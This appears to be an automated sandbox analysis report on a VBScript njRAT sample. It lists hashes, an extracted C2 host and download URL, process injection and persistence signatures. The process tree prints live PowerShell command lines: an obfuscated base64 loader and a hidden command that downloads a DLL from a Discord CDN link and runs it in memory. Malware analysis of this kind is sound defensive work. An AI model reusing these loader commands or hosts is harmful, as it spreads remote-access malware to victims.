Analysis
- max time kernel: 147s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20220721-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 06-08-2022 06:43

Static task: static1
Behavioral task: behavioral1
Sample: tmpuB1xoC.vbs
Resource: win7-20220715-en
General
- Target: tmpuB1xoC.vbs
- Size: 757KB
- MD5: 9dc5849357ad8c24dee16b6103c76e07
- SHA1: 71934dc525d7cff4d493a5737d34188dd1906ec4
- SHA256: 2d04a0d8fac45912b00ddc206423b2a0536e2a035642729535852f6d163946ee
- SHA512: 127bc5c32c8811771d2acbeebe1675b64cadae777158e55f10ec724a92396a70ce67c451443470e1eb630834f916a76c8f4c080f2a431119d6fc40e204c297d3
Malware Config
- Extracted: https://cdn.discordapp.com/attachments/979582020927774773/980218074567421972/dl.txt
- Extracted: njrat
  puerto2547.duckdns.org:2547
  d52c2b17132548b
  - reg_key: d52c2b17132548b
  - splitter: @!#&^%$
Signatures
-
Blocklisted process makes network request (2 IoCs)
Processes (powershell.exe):
flow | pid | process
5 | 536 | powershell.exe
15 | 536 | powershell.exe
-
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes (WScript.exe):
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | WScript.exe
-
Drops startup file (2 IoCs)
Processes (powershell.exe):
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VU45vy.vbs | powershell.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VU45vy.vbs | powershell.exe
-
Suspicious use of SetThreadContext (1 IoCs)
Processes (powershell.exe):
description | pid | process | target process
PID 536 set thread context of 4060 | 536 | powershell.exe | RegSvcs.exe
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes (powershell.exe, powershell.exe):
pid | process
4508 | powershell.exe
4508 | powershell.exe
536 | powershell.exe
536 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken (37 IoCs)
Processes (powershell.exe, powershell.exe, RegSvcs.exe):
description | pid | process
Token: SeDebugPrivilege | 4508 | powershell.exe
Token: SeDebugPrivilege | 536 | powershell.exe
Token: SeDebugPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
Token: 33 | 4060 | RegSvcs.exe
Token: SeIncBasePriorityPrivilege | 4060 | RegSvcs.exe
-
Suspicious use of WriteProcessMemory (12 IoCs)
Processes (WScript.exe, powershell.exe, powershell.exe):
description | pid | process | target process
PID 728 wrote to memory of 4508 | 728 | WScript.exe | powershell.exe
PID 728 wrote to memory of 4508 | 728 | WScript.exe | powershell.exe
PID 4508 wrote to memory of 536 | 4508 | powershell.exe | powershell.exe
PID 4508 wrote to memory of 536 | 4508 | powershell.exe | powershell.exe
PID 536 wrote to memory of 4060 | 536 | powershell.exe | RegSvcs.exe
PID 536 wrote to memory of 4060 | 536 | powershell.exe | RegSvcs.exe
PID 536 wrote to memory of 4060 | 536 | powershell.exe | RegSvcs.exe
PID 536 wrote to memory of 4060 | 536 | powershell.exe | RegSvcs.exe
PID 536 wrote to memory of 4060 | 536 | powershell.exe | RegSvcs.exe
PID 536 wrote to memory of 4060 | 536 | powershell.exe | RegSvcs.exe
PID 536 wrote to memory of 4060 | 536 | powershell.exe | RegSvcs.exe
PID 536 wrote to memory of 4060 | 536 | powershell.exe | RegSvcs.exe
Processes
-
C:\Windows\System32\WScript.exe (tree depth 1)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmpuB1xoC.vbs"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $CglO = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEMAbwBwAHkA☈☈☈wB0AGEAcgB0AH☈☈☈AcABSAG8AZABhAC☈☈☈AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBTAHkAcwB0AG☈☈☈AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOQA3ADkANQA4ADIAMAAyADAAOQAyADcANwA3ADQANwA3ADMALwA5ADgAMAAyADEAOAAwADcANAA1ADYANwA0ADIAMQA5ADcAMgAvAGQAbAAuAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG☈☈☈AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH☈☈☈ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG☈☈☈AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAZgAyADEAOABjAGIAMQA0AGIAMQBkADMALQBiAD☈☈☈ANgBiAC0ANwBlAGQANAAtADgAMQBjAD☈☈☈ALQBlADkAMwA3ADIANgBjAGYAPQBuAG☈☈☈AawBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAB0AC4AcwBvAGQAbwByAHQAYwBlAGwAZQAwADIAJQBwAG0AbwBjAC8AbwAvAG0AbwBjAC4AdABvAHAAcwBwAHAAYQAuAG8AYwBpAG4AbwByAHQAYwBlAGwAZQAtAHAAbQBvAGMALwBiAC8AMAB2AC8AbQBvAGMALgBzAGkAcABhAG☈☈☈AbABnAG8AbwBnAC4AZQBnAGEAcgBvAHQAcwBlAHMAYQBiAG☈☈☈AcgBpAGYALwAvADoAcwBwAHQAdABoACcAIAAsACAAJABSAG8AZABhAEMAbwBwAHkAIAAsACAAJwBWAF☈☈☈ANAA1AHYAeQAnACAAKQApAA==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $CglO.replace('☈☈☈','U') ) );$OWjuxD = $OWjuxD.replace('%CopyStartupRoda%', 'C:\Users\Admin\AppData\Local\Temp\tmpuB1xoC.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 3)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\tmpuB1xoC.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/979582020927774773/980218074567421972/dl.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('f218cb14b1d3-b56b-7ed4-81c5-e93726cf=nekot&aidem=tla?txt.sodortcele02%pmoc/o/moc.topsppa.ocinortcele-pmoc/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $RodaCopy , 'VU45vy' ))"
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (tree depth 4)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 3KB
MD5: f41839a3fe2888c8b3050197bc9a0a05
SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 64B
MD5: a6c9d692ed2826ecb12c09356e69cc09
SHA1: def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256: a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512: 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
memory/536-134-0x00007FFDC3FB0000-0x00007FFDC4A71000-memory.dmp
Filesize: 10.8MB
-
memory/536-137-0x00007FFDC3FB0000-0x00007FFDC4A71000-memory.dmp
Filesize: 10.8MB
-
memory/536-132-0x0000000000000000-mapping.dmp
-
memory/4060-142-0x00000000059F0000-0x0000000005F94000-memory.dmp
Filesize: 5.6MB
-
memory/4060-136-0x0000000000406A5E-mapping.dmp
-
memory/4060-135-0x0000000000400000-0x000000000040C000-memory.dmp
Filesize: 48KB
-
memory/4060-141-0x0000000005340000-0x00000000053DC000-memory.dmp
Filesize: 624KB
-
memory/4060-143-0x0000000005640000-0x00000000056D2000-memory.dmp
Filesize: 584KB
-
memory/4060-144-0x0000000005560000-0x000000000556A000-memory.dmp
Filesize: 40KB
-
memory/4060-145-0x00000000057D0000-0x0000000005836000-memory.dmp
Filesize: 408KB
-
memory/4508-130-0x0000000000000000-mapping.dmp
-
memory/4508-131-0x00000128D9890000-0x00000128D98B2000-memory.dmp
Filesize: 136KB
-
memory/4508-140-0x00007FFDC3FB0000-0x00007FFDC4A71000-memory.dmp
Filesize: 10.8MB
-
memory/4508-133-0x00007FFDC3FB0000-0x00007FFDC4A71000-memory.dmp
Filesize: 10.8MB